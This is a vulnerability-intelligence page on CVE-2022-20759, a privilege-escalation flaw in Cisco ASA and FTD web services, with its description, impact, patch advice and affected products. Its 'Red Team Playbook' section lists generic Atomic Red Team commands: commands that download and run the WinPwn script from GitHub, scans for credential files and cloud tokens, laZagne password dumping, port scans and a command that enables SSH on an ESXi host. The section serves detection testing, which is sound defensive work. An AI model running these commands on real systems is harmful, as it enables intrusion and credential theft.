CVE-2022-20759
Overview
This vulnerability is a privilege escalation flaw caused by improper separation of authentication and authorization scopes within the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software. The affected component is the remote access VPN web management interface, which incorrectly allows authenticated but unprivileged users to escalate their privileges to level 15. The root cause lies in inadequate access control enforcement on crafted HTTPS requests targeting this interface.
Vulnerability Description
A vulnerability in the web services interface for remote access VPN features of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, but unprivileged, remote attacker to elevate privileges to level 15. This vulnerability is due to improper separation of authentication and authorization scopes. An attacker could exploit this vulnerability by sending crafted HTTPS messages to the web services interface of an affected device. A successful exploit could allow the attacker to gain privilege level 15 access to the web management interface of the device. This includes privilege level 15 access to the device using management tools like the Cisco Adaptive Security Device Manager (ASDM) or the Cisco Security Manager (CSM). Note: With Cisco FTD Software, the impact is lower than the CVSS score suggests because the affected web management interface allows for read access only.
Impact
An authenticated remote attacker with low privileges can escalate to full administrative access (privilege level 15) on the device's web management interface, enabling full control over device configuration and management functions. This requires network access and valid authentication credentials but no user interaction. For Cisco ASA, this leads to complete device compromise, while for Cisco FTD, the impact is reduced due to read-only access on the affected interface. The CVSS vector indicates network attack vector, low attack complexity, and privileges required at low level (PR:L).
Solution
Cisco has released patches addressing this vulnerability as detailed in their security advisory (https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-mgmt-privesc-BMFMUvye). Users should upgrade affected Cisco ASA and Firepower Threat Defense software to the fixed versions specified in the advisory. Administrators are advised to follow Cisco’s official patching instructions and verify that management interfaces are updated to prevent privilege escalation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical vulnerability exists in the web services interface for remote access VPN features of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software. This flaw arises from improper separation of authentication and authorization scopes, allowing an authenticated but unprivileged remote attacker to escalate their privileges to level 15. This level of access is significant as it grants full administrative control over the device, enabling the attacker to manipulate configurations, access sensitive data, and potentially disrupt network operations. The vulnerability is exploited by sending specially crafted HTTPS messages to the affected web services interface, which can be particularly concerning in environments where these devices are integral to network security.
The attack vector for this vulnerability is primarily through the web management interface, which is accessible to authenticated users. An attacker with valid credentials, albeit with limited privileges, can leverage this flaw to gain elevated access. This scenario is especially dangerous in environments where multiple users have varying levels of access, as it allows an attacker to exploit the trust placed in authenticated sessions. While the impact on Cisco FTD Software is somewhat mitigated due to its read-only access at the affected interface, the risk remains substantial for ASA Software, where full administrative privileges can be obtained.
The real-world implications of this vulnerability are profound, particularly for organizations relying on Cisco's security appliances to safeguard their networks. Gaining administrative access could lead to unauthorized changes in security policies, exposure of sensitive information, or even a complete compromise of the network infrastructure. The potential for data breaches, service disruptions, and reputational damage poses a significant business risk. Organizations may face regulatory scrutiny and financial penalties if sensitive data is compromised, further emphasizing the importance of addressing this vulnerability promptly.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating the affected software to the latest versions provided by Cisco is crucial, as patches are typically released to address such vulnerabilities. Additionally, employing network segmentation and strict access controls can help limit the potential impact of an exploit. Monitoring logs for unusual access patterns or unauthorized attempts to access the web management interface is also essential for early detection of potential exploitation attempts. Organizations should consider conducting regular security assessments and penetration testing to identify and remediate vulnerabilities proactively.
In conclusion, the vulnerability in the web services interface of Cisco ASA and FTD Software represents a significant threat to network security. With the potential for privilege escalation and the associated risks, it is imperative for organizations to take immediate action to mitigate this vulnerability. By implementing robust detection and response strategies, organizations can better protect their networks from the risks posed by this and similar vulnerabilities, ensuring the integrity and confidentiality of their data and systems.
Affected Products (9)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cisco | Firepower Threat Defense | All |
cpe:2.3:a:cisco:firepower_threat_defense:*:*:*:*:*:*:*:*
|
|
|
Cisco | Firepower Threat Defense | All |
cpe:2.3:a:cisco:firepower_threat_defense:*:*:*:*:*:*:*:*
|
|
|
Cisco | Firepower Threat Defense | All |
cpe:2.3:a:cisco:firepower_threat_defense:*:*:*:*:*:*:*:*
|
|
|
Cisco | Firepower Threat Defense | 7.1.0 |
cpe:2.3:a:cisco:firepower_threat_defense:7.1.0:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | All |
cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | All |
cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | All |
cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | All |
cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | All |
cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-122 | Privilege Abuse |
33%
|
High | Medium | |
| CAPEC-233 | Privilege Escalation |
33%
|
— | — | |
| CAPEC-58 | Restful Privilege Elevation |
30%
|
High | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-20759 |
| tools.cisco.com |
GitHub CVE
vendor-advisory
x_refsource_CISCO
|
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-mgmt-privesc-BMFMUvye |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/orangecertcc/security-research/security/advisories/GHSA-gq88-gqmj-7v24 |